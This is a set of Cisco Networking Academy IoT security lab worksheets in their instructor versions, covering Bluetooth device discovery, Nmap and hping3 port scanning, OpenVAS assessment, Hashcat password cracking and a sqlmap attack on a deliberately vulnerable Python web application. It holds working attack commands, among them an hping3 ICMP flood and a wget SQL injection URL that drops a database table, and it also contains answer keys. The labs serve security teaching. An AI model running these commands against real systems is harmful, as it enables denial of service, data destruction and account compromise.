Step 2: Verify and activate the Bluetooth interface/services on the Raspberry Pi.
a. Within the PL-App, open a terminal window and enter the rfkill list command to check if the Bluetooth
interface is blocked by software:
(pl-app) root@pi:/home/pi/notebooks# rfkill list
0: phy0: Wireless LAN
Soft blocked: no
Hard blocked: no
1: hci0: Bluetooth
Soft blocked: no
Hard blocked: no
b. If the Bluetooth Interface hci0 is blocked, use the command rfkill unblock bluetooth to unlock it.
c. Use the systemctl status bluetooth.service command to show the status of the Bluetooth service.
(pl-app) root@pi:/home/pi/notebooks# systemctl status bluetooth.service
● bluetooth.service - Bluetooth service
Loaded: loaded (/lib/systemd/system/bluetooth.service; enabled; vendor
preset: enabled)
Active: active (running) since Tue 2018-05-22 00:00:02 UTC; 10h ago
Docs: man:bluetoothd(8)
Main PID: 522 (bluetoothd)
Status: "Running"
CGroup: /system.slice/bluetooth.service
└─522 /usr/lib/bluetooth/bluetoothd
<output omitted>
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 6 www.netacad.com
Lab - Sniffing Bluetooth with the Raspberry Pi
d. If the Bluetooth service status is not “active (running)”, use the command systemctl start
bluetooth.service to start it.
(pl-app) root@pi:/home/pi/notebooks# systemctl start bluetooth.service
e. Use the hciconfig hci0 command to display the status of the Bluetooth interface.
(pl-app) root@pi:/home/pi/notebooks# hciconfig hci0
hci0: Type: Primary Bus: UART
BD Address: B8:27:EB:72:CC:11 ACL MTU: 1021:8 SCO MTU: 64:1
UP RUNNING
RX bytes:6770 acl:46 sco:0 events:230 errors:0
TX bytes:3819 acl:46 sco:0 commands:90 errors:0
f. If the hci0 interface status is down, use the command hciconfig hci0 up to activate it.
(pl-app) root@pi:/home/pi/notebooks# hciconfig hci0 up
Part 2: Using the CLI to Detect and Display Information about Bluetooth
Devices
a. From the command line, use the command bluetoothctl to launch the Bluetooth tool. The prompt will
change to [bluetooth] and will be displayed. It will display some information about the Bluetooth
controller of your Raspberry Pi and probably some information about Bluetooth devices connected or
available for pairing:
(pl-app) root@pi:/home/pi/notebooks# bluetoothctl
[NEW] Controller B8:27:EB:72:CC:11 raspberrypi [default]
[bluetooth]#
b. Enter the scan on command to start searching for nearby Bluetooth devices and scan off to stop it. You
should see the MAC addresses and sometimes the device name of all Bluetooth devices discovered by
the Raspberry Pi:
[bluetooth]# scan on
Discovery started
[CHG] Controller B8:27:EB:72:CC:11 Discovering: yes
[NEW] Device A4:C1:38:CC:F5:42 Triones-A4C138CCF542
[NEW] Device DA:B6:4A:F2:A8:BA Band
[NEW] Device 28:98:7B:E1:CE:D8 GT-S700
[bluetooth]# scan off
Take note of the MAC address (and if available the name) of some discovered Bluetooth devices:
____________________________________________________________________________________
Answers will vary.
c. Use the info command followed by the MAC address of a discovered device to obtain detailed
information about the device:
[bluetooth]# info DA:B6:4A:F2:A8:BA
Device DA:B6:4A:F2:A8:BA
Name: Band
Alias: Band
Paired: no
Trusted: no
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 6 www.netacad.com
Lab - Sniffing Bluetooth with the Raspberry Pi
Blocked: no
Connected: no
LegacyPairing: no
UUID: Anhui Huami Information.. (0000fee0-0000-1000-8000-00805f9b34fb)
ManufacturerData Key: 0x0157
Take note of the information displayed and perform a web search for the meaning of some fields
displayed and report below a summary of the main information displayed.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The output for DA:B6:4A:F2:A8:BA is a smartband. The UUID usually represents some common service
(protocol) that the discovered Bluetooth device supports.
Additional Example 1: This output is related to a GT-S7500 Smartphone.
[bluetooth]# info 28:98:7B:E1:CE:D8
Device 28:98:7B:E1:CE:D8
Name: GT-S7500
Alias: GT-S7500
Class: 0x58020c
Icon: phone
Paired: no
Trusted: no
Blocked: no
Connected: no
LegacyPairing: no
UUID: Audio Source (0000110a-0000-1000-8000-00805f9b32fb)
UUID: A/V Remote Control Target (0000110c-0000-1000-8000-00805f9b32fb)
UUID: Handsfree Audio Gateway (0000111f-0000-1000-8000-00805f9b32fb)
UUID: Headset AG (00001112-0000-1000-8000-00805f9b32fb)
UUID: OBEX Object Push (00001105-0000-1000-8000-00805f9b32fb)
UUID: Phonebook Access Server (0000112f-0000-1000-8000-00805f9b32fb)
[bluetooth]#
Additional Example 2: This output is related to a LED Bluetooth controller.
[bluetooth]# info A4:C1:38:CC:F5:42
Device A4:C1:38:CC:F5:42
Name: Triones-A4C138CCF542
Alias: Triones-A4C138CCF542
Paired: no
Trusted: no
Blocked: no
Connected: no
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 6 www.netacad.com
Lab - Sniffing Bluetooth with the Raspberry Pi
Legacy Pairing: no
UUID: Unknown (0000ffd0-0000-1000-8000-00805f9b34fb)
UUID: Unknown (0000ffd5-0000-1000-8000-00805f9b34fb)
[bluetooth]#
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 5 of 6 www.netacad.com
Lab - Sniffing Bluetooth with the Raspberry Pi
Connection successful
[CHG] Device CA:4C:FB:5E:00:BA ServicesResolved: yes
[K800BA]#
Are you able to connect (without permission from the owner) to some Bluetooth devices? Write your
findings below:
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary. You may not be able to connect, without the authorization of the owner, with Bluetooth
Devices implementing high level of security. The Raspberry Pi can be connected to a Bluetooth device
without PIN. Probably further operations may be accomplished after pairing the device. Please note that
the success/output of the command depends on the Bluetooth version and Bluetooth Security level mode
of the target device. For example, Bluetooth devices that use Security Mode 1 are inherently insecure.
e. Enter quit to exit the Bluetooth tool.
[bluetooth]# quit
Part 4: Clean Up
a. Enter systemctl stop bluetooth.service to disable the Bluetooth service.
(pl-app) root@Pi-3:/home/pi/notebooks# systemctl stop bluetooth.service
b. Verify that the Bluetooth service has been disabled with the systemctl status bluetooth.service
command.
(pl-app) root@Pi-3:/home/pi/notebooks# systemctl status bluetooth.service
● bluetooth.service - Bluetooth service
Loaded: loaded (/lib/systemd/system/bluetooth.service; enabled; vendor
preset: enabled)
Active: inactive (dead) since Tue 2018-11-27 21:47:30 UTC; 1min 10s ago
Docs: man:bluetoothd(8)
Process: 843 ExecStart=/usr/lib/bluetooth/bluetoothd (code=exited,
status=0/SUCCESS)
Main PID: 843 (code=exited, status=0/SUCCESS)
Status: "Quitting"
<output omitted>
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 6 of 6 www.netacad.com
Lab - Port Scanning an IoT Device (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Topology
Objectives
Part 1: Perform a Nmap network discovery scan
Part 2: Compare a Nmap TCP default port scan and full scan
Part 3: Perform a Nmap UDP Scan
Part 4: Perform Nmap OS and Service Foot Printing
Background / Scenario
Nmap, or “Network mapper,” is a free and open source network port scanner. It can be used to test IoT
devices and firewalls for open, closed, or filtered ports and additionally can provide an inventory of devices
and services available on a network. Nmap uses the TCP header flag fields URG, ACK, PSH, RST, SYN,
FIN, shown in the diagram, to accomplish its scans. It also uses other protocols such as UDP, ICMP and a
built-in database of known OS and application signatures. Nmap is included with Kali, but can also be
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 7 www.netacad.com
Lab - Port Scanning an IoT Device
downloaded from https://nmap.org/. A comprehensive reference about how Nmap works and how it is used is
available at the Nmap website.
Required Resources
• Raspberry Pi 3 Model B or later
• 8GB Micro SD card (minimum required)
• PC with IoTSec Kali VM
• Network connectivity between PC and Raspberry Pi
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 7 www.netacad.com
Lab - Port Scanning an IoT Device
Refer to the man page and complete the table below. There are many other resources available online to
help you learn Nmap.
Nmap will do host discovery scan, but will not do the normal
-sn no port scan port scan.
f. Perform a scan on your network by specifying the network address and bit mask.
root@kali:~# nmap 203.0.113.0/24
What is the IP address of the Raspberry Pi?
____________________________________________________________________________________
Answers will vary. The assigned IP address will be in the network of 203.0.113.0/24.
g. Sometimes a device would not reply to Nmap’s initial network discovery scan because of a firewall,
IDS/IPS system etc. Instead of relying on the initial scan to discover hosts that are alive for further
scanning, we can use Nmap to scan the network by assuming all hosts are alive.
root@kali:~# nmap -Pn 203.0.113.0/24
What is the IP address and MAC address of your Raspberry PI?
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 7 www.netacad.com
Lab - Port Scanning an IoT Device
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 7 www.netacad.com
Lab - Port Scanning an IoT Device
This will allow us to see the UDP traffic generated by nmap to the Raspberry PI. Notice in the UDP
header above there are no flags. We can only send UDP packets and receive a possible “port
unreachable or destination unreachable” message meaning the port is closed.
c. In the Kali VM terminal, enter the command nmap with -sU option scanning the IP address of your
Raspberry Pi.
root@kail:~# nmap -sU -F 203.0.113.13
d. It will take a few minutes, but look at the Wireshark capture. As you scroll down the packets, you will see
some “Destination unreachable” on different ports indicating the port is closed.
How many UDP ports are there? How many UDP ports does Nmap scan, by default? (Use web search as
necessary.)
____________________________________________________________________________________
There are 65,535 UDP ports. Nmap scans only the most commonly used 1,000.
What are the UDP ports that are open from the scan? What protocols use these UDP ports?
____________________________________________________________________________________
____________________________________________________________________________________
Answers may vary. Ports 68 and 5353 are most likely. The bootp and Multicast DNS use these ports.
These services are used by PL-App.
What is the meaning of the -F option? Try the same scan without the -F. What is the difference?
____________________________________________________________________________________
____________________________________________________________________________________
The -F option stands for fast. Only the most common 100 ports are scanned. This makes the scan much
faster.
e. Stop the Wireshark capture when finished and clear the filter.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 5 of 7 www.netacad.com
Lab - Port Scanning an IoT Device
Look at the packets in Wireshark. What protocols were used to determine the OS?
____________________________________________________________________________________
____________________________________________________________________________________
Answers may vary. TCP, UDP, & ICMP
d. We can sometimes identify a device by looking at the time to live (TTL) field of a local ping response,
which varies by device OS. See the table below:
Cisco 255
Windows 128
Linux 64
In the Kali VM terminal, enter the command to ping your Raspberry Pi with 4 ICMP packets.
root@kali:~# ping -c4 203.0.113.13
What is the response time? Is it consistent with the Nmap identification?
____________________________________________________________________________________
____________________________________________________________________________________
The response time is 64 which is consistent with a Linux OS response.
e. Stop the Wireshark capture when finished.
22 SSH-2.0-OpenSSH_7.4p1
80 Tornado httpd 4.5.1
88 nginx 1.10.3
89 Node.js Express framework
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 6 of 7 www.netacad.com
Lab - Port Scanning an IoT Device
What is different in the port identification from the Nmap TCP scan in Part 2 of the lab and this application
service scan? What implications does this have for IoT security?
____________________________________________________________________________________
____________________________________________________________________________________
In the normal TCP scan, only protocols are identified. In this scan, details about the running services are
also shown. These details can be used to identify versions of software services that have well-known
vulnerabilities.
What additional functions does this scan also perform?
____________________________________________________________________________________
____________________________________________________________________________________
Nmap also performs a traceroute, OS detection, and SSH details.
c. Stop the Wireshark capture when finished.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 7 of 7 www.netacad.com
Lab - Packet Crafting to Exploit Unsecured Ports (Instructor
Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Topology
Objectives
Part 1: Using hping3 for Port Scanning
Part 2: Crafting Different Types of ICMP Messages
Part 3: Launching DoS Attacks
Background / Scenario
hping3 is a tool used to send custom-crafted TCP/IP packets to a network target in order to elicit a response.
Many values in IP packets and TCP headers can be specified in hping3 and the resulting packets sent out on
the network. Like Nmap, hping3 can use the TCP header flag fields URG, ACK, PSH, RST, SYN, and FIN to
accomplish its scans. It can also craft packets with other protocols such as UDP and ICMP. Unlike Nmap,
however, hping3 can use its ability to craft packets to attack a target. hping3 is included in Kali or can be
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 5 www.netacad.com
Lab - Packet Crafting to Exploit Unsecure Ports
downloaded from http://www.hping.org/. Because hping3 can be used for malicious purposes, avoid using it
on production networks unless you have permission to do so.
Required Resources
• Raspberry Pi 3 Model B or later
• 8GB Micro SD card (minimum required)
• PC with IoTSec Kali VM
• Network connectivity between PC and Raspberry Pi
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 5 www.netacad.com
Lab - Packet Crafting to Exploit Unsecure Ports
j. We will first craft packets to do a port scan against the IP address of your Raspberry Pi.
root@kali:~# hping3 -8 0-100 -S 203.0.113.13
Refer to the Wireshark capture, the man pages, and other sources on the Internet. What do the options 8,
0-100 and -S do?
____________________________________________________________________________________
____________________________________________________________________________________
-8 signifies scan mode, 0-100 is the port range to be scanned and -S is sets the SYN flag in the scan.
What ports are shown as open?
____________________________________________________________________________________
Answers may vary. Ports 22 and 80 will be open at minimum.
k. Expand your scan to include ports up to 1000.
root@kali:~# hping3 -8 0-1000 -S 203.0.113.13
Did you find any additional ports?
____________________________________________________________________________________
No
What TCP flag was set in the shown in Wireshark?
____________________________________________________________________________________
SYN
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 5 www.netacad.com
Lab - Packet Crafting to Exploit Unsecure Ports
f. Apply the following filter in Wireshark using IP address of Kali VM as the source address and IP address
of your Raspberry Pi as the destination address.
ip.src == 203.0.113.1 && ip.dst == 203.0.113.13
g. Repeat the hping3 command above, but this time send ICMP code 17.
h. Review the Wireshark results. Which ICMP message was sent?
____________________________________________________________________________________
Address Mask Request
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 5 www.netacad.com
Lab - Packet Crafting to Exploit Unsecure Ports
g. Start a new Wireshark capture. Click Continue without Saving when prompted to save the capture.
Apply the display filter that specifies the Kali VM as the source and the Raspberry Pi as the destination,
as was done previously in this lab.
h. In the Kali VM terminal, enter the hping3 command to send a flood attack.
root@kali:~# hping3 --flood –-icmp -p 22 203.0.113.13
Look at Wireshark what type of ICMP messages are you seeing?
____________________________________________________________________________________
Type 8 echo request
i. Press Ctrl-C to stop the flood.
j. Complete the following table for the hping3 options that you used in this lab. Use the hping3 man page or
other information resources.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 5 of 5 www.netacad.com
Lab – Use OpenVAS for Vulnerability Assessment (Instructor
Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Addressing Table
Objectives
Part 1: Exploring OpenVAS
Part 2: Configuring a Vulnerability Scan
Part 3: Reviewing the Results
Background / Scenario
As we know, IoT devices, especially those designed for the home, frequently include WWW applications that
are accessed from the Internet. These applications are a significant part of the IoT system attack surface. A
vulnerable WWW application could allow hackers to take over a home automation application and cause
damage to property, for example.
Open Vulnerability Assessment System (OpenVAS) is a framework that provides services and tools for web
application vulnerability scanning and management. Network Vulnerability Tests (NVT) are used by OpenVAS
to check for existing security issues. NVTs are developed based on Common Vulnerabilities and Exposures
(CVE).
CVE is a collection of publicly known security vulnerabilities that is available on the Internet. The
vulnerabilities are divided into two categories: vulnerabilities and exposures. The entries provide an
identification number, a description, and public references regarding the cybersecurity vulnerabilities. The
goal of the CVE is to enable the sharing of data across different vulnerability tools, repositories, and services.
CVE entries are used by the Common Vulnerability Scoring System (CVSS) as examples.
The CVSS provides an open and standardized way for scoring vulnerabilities. The scoring system allows an
organization to prioritize which vulnerabilities to fix and assess the impact of the vulnerabilities on their
systems. CVE and CVSS can be used together, however they are different systems.
In this lab, you will use OpenVAS to perform a vulnerability scan on the intentionally vulnerable Metasploitable
VM web application and review the vulnerability assessment report from the scan.
Required Resources
• Host computer with at least 4 GB of RAM and 15 GB of free disk space
• Oracle VirtualBox
• IoT Security Kali and Metasploitable VMs
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 6 www.netacad.com
Lab – Use OpenVAS for Vulnerability Assessment
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 6 www.netacad.com
Lab – Use OpenVAS for Vulnerability Assessment
b. Click the white star in the blue box icon in the upper left-hand corner below the Dashboard menu.
c. When the New Target dialog box appears, enter the following information:
Name: Metasploitable VM
Hosts Manual: 203.0.113.5
Alive Test: Consider Alive.
d. Click Create. This process discovers targets that can be scanned in an OpenVAS task.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 6 www.netacad.com
Lab – Use OpenVAS for Vulnerability Assessment
Answers will vary. Example: TCP timestamps allows a user to determine the uptime of a computer.
What is the provided solution?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary. The TCP timestamps can be disabled.
Linux: add the line 'net.ipv4.tcp_timestamps = 0' to /etc/sysctl.conf. Execute 'sysctl -p' to apply the settings at
runtime.
Windows (excluding Server 2008 and Vista): execute 'netsh int tcp set global timestamps=disabled'
Severity: Low
What is the IP address and port number on the host? _________________________ Answers will vary.
What is the vulnerability and its impact?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary.
What is the provided solution?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary.
Severity: Medium
What is the IP address and port number on the host? _________________________ Answers will vary.
What is the vulnerability and its impact?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 6 www.netacad.com
Lab – Use OpenVAS for Vulnerability Assessment
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 5 of 6 www.netacad.com
Lab – Use OpenVAS for Vulnerability Assessment
e. Locate the OS End of Life Detection vulnerability. Investigate this vulnerability by clicking it and
exploring the explanation. What is this vulnerability and why is it a security vulnerability?
____________________________________________________________________________________
____________________________________________________________________________________
The OS running on Metasploitable is Ubuntu 8.04. This OS went end of life in May of 2013. This means
that security patches for the OS are not being created and distributed. This means that vulnerabilities for
this version that have been discovered since it went EOL could be exploited by hackers.
f. Investigate the vulnerability called phpinfo() output accessible. Open the Metasploitable phpinfo page in
your Kali browser. What kind of information contained on that page could be used by hackers?
____________________________________________________________________________________
____________________________________________________________________________________
A large amount of information about PHP is displayed on this page including PHP and module versions,
configuration information, internal IP addresses, etc. This is information that shouldn't be available to
users on the open web.
g. Investigate the vulnerability called /doc directory browsable. Open the /doc directory in your browser.
How could a hacker use this access to attack a system?
____________________________________________________________________________________
____________________________________________________________________________________
They could find out what software and software versions are running on the server.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 6 of 6 www.netacad.com
Lab - Challenge Passwords with Kali Tools (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
In this lab, you will explore tools that are available in the Kali VM to challenge passwords.
Part 1: Using Hashcat to Challenge Passwords
Part 2: Investigating Other Password Challenging Tools on Kali Linux
Background / Scenario
There are numerous Kali tools used to challenge passwords. It is very likely you have already seen and/or
used John the Ripper (john). John is a very powerful tool, but there are other tools that might be more
appropriate to use depending on the situation. It is very important to be aware of as many tools as possible so
you can select the most appropriate tool for the task at hand.
Hashcat is a very powerful password challenging tool that offers different features and has other advantages
in comparison to John the Ripper that you might find helpful to know how to use. Hashcat is an offline
password cracking tool that is claimed to be the world’s fastest CPU-based password recovery tool. It offers
various attack modes including dictionary, brute force, and combination attack. For the purposes of this lab,
we will use the combination attack based on the available information. We will be using a combination attack
to recover the password for a serious golf fan.
Required Resources
• PC with IoTSec Kali VM installed
• Internet connection
Step 2: Create the necessary dictionary files and MD5 hash file.
A MD5 hash value has been recovered for a user, and it is your job to crack this value. Rather than using a
brute force method that could take a long time, you will be using known information to crack this value much
quicker. The user is a golf fan and has specifically talked about Tiger Woods. In addition, it was discovered
from one of his social media public profiles that he graduated in 2002.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 3 www.netacad.com
Lab - Challenge Passwords with Kali Tools
It is very typical for users to create passwords using words from their special interests or hobbies. When their
special interests are known, wordlists can be very helpful in recovering passwords or cracking hashes. There
are numerous sites out that provide wordlists for a wide variety of interests. For example:
https://packetstormsecurity.com/Crackers/wordlists/
This site provides a golfers.gz file that contains a list of golf names/words that can be used for a wordlist. It is
also known that users will usually take a name and make the password more complicated by either repeating
the name or word and/or adding numbers or special characters to it.
The following MD5 hash value was provided to you by a known golf fan, and it is your job to crack it:
22bb33653af9cc8f21d71fa0e55751b4
MD5 hash values are hexadecimal characters. Hexadecimal characters are alphanumeric from a to f and
numeric values from 0 through 9.
For the purposes of this lab, and time constraint issues, we will create our own dictionaries and use just a few
words per dictionary.
a. Create a dictionary file using multiple combinations of “tiger woods”:
root@kali:~/passwordlab# echo “tiger woods” > dict1.txt
root@kali:~/passwordlab# echo “tiger” >> dict1.txt
root@kali:~/passwordlab# echo “woods” >> dict1.txt
root@kali:~/passwordlab# echo “golf” >> dict1.txt
root@kali:~/passwordlab# more dict1.txt
b. The second dictionary file we will create will be the file that Hashcat will run the various combinations
with. It is very common for users to combine numbers with their passwords in order to make them longer
and minimum length requirements.
root@kali:~/passwordlab# echo “0” > dict2.txt
root@kali:~/passwordlab# echo “1” >> dict2.txt
root@kali:~/passwordlab# echo “2” >> dict2.txt
root@kali:~/passwordlab# echo “2002” >> dict2.txt
root@kali:~/passwordlab# echo “02” >> dict2.txt
root@kali:~/passwordlab# more dict2.txt
c. Save the md5 hash value into a text file called hash.txt:
root@kali:~/passwordlab# echo "22bb33653af9cc8f21d71fa0e55751b4" > hash.txt
d. If there are any typos with the hash when entering it, the lab will not work.
What command did you use to view the content in the file hash.txt? _____________________________
more hash.txt
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 3 www.netacad.com
Lab - Challenge Passwords with Kali Tools
hashcat -a 1
b. The --force option below is required because you are running this on a virtual image.
root@kali:~/passwordlab# hashcat –m 0 –a 1 –-force hash.txt dict1.txt
dict2.txt
Note: If you want to run this again with the same hash value, use the --potfile-disable option:
root@kali:~/passwordlab# hashcat –m 0 –a 1 –-force hash.txt dict1.txt
dict2.txt --potfile-disable
c. Review the output from this command and answer the following questions:
What was the recovered password from the MD5 hash? _______________________________________
tiger02
What was the status? __________________________________________________________________
Cracked
How long did it take? ___________________________________________________________________
3 seconds
d. To view the saved passwords from the hash.txt file use the following command:
root@kali:~/passwordlab# hashcat –-show hash.txt
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 3 www.netacad.com
Lab - Web Application Vulnerability (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Topology
Required Resources
Raspberry Pi 3 Model B or later (with PL-App)
8GB Micro SD card (minimum required)
PC with IoTSec Kali VM
Network connectivity between PC and Raspberry Pi
Objectives
In this lab, you will discover vulnerabilities in a simple Python web application using tools available in the
IoTSec Kali VM. You will exploit the vulnerabilities much as a hacker would. Finally, you will learn how to
address the vulnerabilities.
Part 1: Set up a Simple IoT Monitoring Application
Part 2: Conduct a Reconnaissance Attack
Part 3: Exploit a Vulnerable Web Application
Part 4: Add Application Protection
Background/Scenario
Many IoT systems include web applications that are used to monitor and control IoT devices. These
applications are also used to view data submitted by IoT devices, often through an analytical dashboard.
Many of these applications are accessed across the open Internet. Users authenticate to the application in
order to make of use of it. Commercial home IoT devices use web applications to provide users with an easy
way to monitor sensors in their homes and to control actuators such as thermostats, electrical outlets, and
alarms.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 13 www.netacad.com
Lab - Web Application Vulnerability
Web application vulnerabilities involve system flaws or weakness in a web application. These vulnerabilities
can be due to form inputs that have not been validated or sanitized, misconfigured web servers, and
application design flaws. Attackers can exploit these weaknesses to compromise the security of the
application. The attacks can use tools such as Nmap and skipfish, to scan for weaknesses. Nmap is a
network exploration tool that can provide information on open ports and operating systems. skipfish is a web
application security scanner. A skipfish scan provides an interactive sitemap by using recursive crawl and
dictionary-based probes.
In this lab, you will exploit a misconfiguration in a simple Python application by using the sqlmap SQL injection
tool that is available in the IoTSec Kali VM. You will discover web application weakness and address them by
implementing a Python script that will sanitize application form input.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 13 www.netacad.com
Lab - Web Application Vulnerability
pi@myPi:~ /.../scripts$ ls
app.py init_mysql.sql (output omitted)
b. Create the application database and tables using the script provided. Please note that during the probing
of the web application the database tables and data might become corrupt. It might be required to re-run
the script to restore the database.
pi@myPi:~ /.../scripts$ sudo mysql < init_mysql.sql
c. The application can then be started from the command line using the following command:
pi@myPi:~ /.../scripts$ python3 app.py
* Running on http://0.0.0.0:8080/ (Press CTRL+C to quit)
* Restarting with stat
Note: Keep this terminal open. The script must be running in order that the lab operate correctly. In
addition, do not attempt to rerun the script from another terminal. Always use the same terminal to run the
script.
d. Test the application from the Kali VM by opening a new web browser and connecting to the web page at
the IP address of the Raspberry Pi with port 8080. The example IP address for this lab is 203.0.113.12.
This IP address will be used throughout the lab.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 13 www.netacad.com
Lab - Web Application Vulnerability
b. To verify that the new data is in the SQL table, navigate to the IP address for your Raspberry Pi at port
8080. Note the number under the No. column. This is the ID used for each post of sensor data. You may
need to refresh your browser window to see newly posted data.
c. Similarly, you can use the update API call to alter the temperature value of the sensor by referring to the
ID number in the data table:
http://203.0.113.12:8080/update/<ID>?temperature=30
where <ID> is replaced with the ID number from the dashboard. In this example, <ID> is 1. Refresh your
browser to see the updated results.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 13 www.netacad.com
Lab - Web Application Vulnerability
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 5 of 13 www.netacad.com
Lab - Web Application Vulnerability
Do research on the web to answer the following questions. What vulnerability was recently discovered in
this web server software? Which company was compromised by an exploit of this vulnerability?
____________________________________________________________________________________
____________________________________________________________________________________
It was possible to inject code to open the Python debug console. Users were able to steal data from
there. The company was Patreon.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 6 of 13 www.netacad.com
Lab - Web Application Vulnerability
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 7 of 13 www.netacad.com
Lab - Web Application Vulnerability
c. To discover the type and name of the database used by the web application, run the following command
and answer the prompts as shown below. This could take a few minutes. You can also observe the
messages on the SSH session.
root@kali:~# sqlmap -u http://203.0.113.12:8080/add/test?temperature=26 --dbs
--threads=10 --current-db
< output omitted >
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads
specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL'
extending provided level (1) and risk (1) values? [Y/n] n
< output omitted >
GET parameter 'temperature' is vulnerable. Do you want to keep testing the
others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 93 HTTP(s)
requests:
---
Parameter: temperature (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: temperature=26' AND SLEEP(5) AND 'Dmqa'='Dmqa
---
[13:45:36] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:45:36] [INFO] fetching current database
< some output omitted >
do you want sqlmap to try to optimize value(s) for DBMS delay responses
(option '--time-sec')? [Y/n] y
[13:45:58] [INFO] adjusting time delay to 1 second due to good response times
vulnSensors
current database: 'vulnSensors'
[13:46:39] [INFO] fetching database names
[13:46:39] [INFO] fetching number of databases
[13:46:39] [WARNING] (case) time-based comparison requires larger statistical
model, please wait.............................. (done)
2
[13:46:42] [WARNING] (case) time-based comparison requires larger statistical
model, please wait.............................. (done)
information_schema
[13:47:46] [INFO] retrieved: vulnSensors
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 8 of 13 www.netacad.com
Lab - Web Application Vulnerability
d. The database type has been discovered as MySQL and the name as vulnSensors. We can also search
for the existing tables in that database. Respond to the prompt as shown below.
root@kali:~# sqlmap -u http://203.0.113.12:8080/add/test?temperature=26 --
dbms=mysql -D vulnSensors --tables
< output omitted >
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: temperature (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: temperature=26' AND SLEEP(5) AND 'Dmqa'='Dmqa
---
[13:51:58] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses
(option '--time-sec')? [Y/n] y
< output omitted >
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[13:53:54] [INFO] fetching tables for database: 'vulnSensors'
[13:53:54] [INFO] fetching number of tables for database 'vulnSensors'
< output omitted >
[1 table]
+---------+
| sensors |
+---------+
< output omitted >
While sqlmap is running, you can view the queries it sends in the PL-App terminal. After a browser refresh,
you can also see that multiple sensor entries have been added.
So far, sqlmap has allowed us to discover that the database system is MySQL, the database name is
vulnSensors, and the table used for storing data is sensors.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 9 of 13 www.netacad.com
Lab - Web Application Vulnerability
Note: There is a space between the second hyphen (-) and the end quote (") at the end of the command.
root@kali:~# wget
"http://203.0.113.12:8080/add/1?temperature=1%27);drop%20table%20sensors;-- "
This will delete the “sensors” table and make the web application unusable. Refresh the web browser to
verify that the sensors table is no longer available. At this point, the web application has become unusable.
